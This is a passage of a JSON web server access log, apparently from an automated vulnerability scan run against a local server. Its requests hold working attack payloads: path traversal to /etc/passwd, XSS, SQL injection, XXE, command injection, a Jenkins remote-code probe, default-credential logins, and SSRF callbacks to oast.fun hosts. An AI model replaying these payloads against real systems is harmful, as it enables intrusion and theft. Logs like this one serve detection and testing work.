AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aj.html?a=devi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts?per_page=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?id=50&file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"username=guacadmin&password=guacadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"_charset_=utf-8&j_username=aparker@geometrixx.info&j_password=aparker&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sftp-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webacs/pages/common/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448 HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/shared/authn/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/sharelinks/1.0/link?url=https://ca285tosmpvbafqg07h0hodim3iixu143.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opennms/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htmltopdf/downfile.php?filename=/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"\x0D\x0A pingback.ping\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://ca285tosmpvbafqg07h0hipnbhzb5ipyd.oast.fun\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://127.0.0.1/?p=1\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"var={\x22body\x22:{\x22file\x22:\x22file:///etc/passwd\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"_dlg[captcha][target]=system(\x5C'ver\x5C')\x5C","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webmail/basic/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libraries/joomla/database/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"Language_S=../../Data/CONFIG/CasDbCnn.dat","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /casmain.xgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET / HTTP/1.0","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zms/admin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/zms/admin/index.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"bsh.script=exec(\x22cat+/etc/passwd\x22);&bsh.servlet.output=raw","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MyErrors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /creaprezzi.php?prezzoperiodo4=%22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"var={\x22body\x22:{\x22file\x22:\x22file:///c://windows/win.ini\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"\x0D\x0A]>\x0D\x0A\x0D\x0A\x0D\x0Aaaaaa\x0D\x0A&xxe;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Autodiscover/Autodiscover.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"username=root&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/luci/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query={__typename} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/web/service/search/auto-completion/domain/en.xml?q=adm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cacti/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@ca285tosmpvbafqg07h0e18g7bwm9qigz.oast.fun", "http_referer":"http://ca285tosmpvbafqg07h0e3qd9xh36s3jc.oast.fun/ref", "request_method":"GET", "http_x_forwarded_for":"spoofed.ca285tosmpvbafqg07h0qpdfxejdus57n.oast.fun"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) 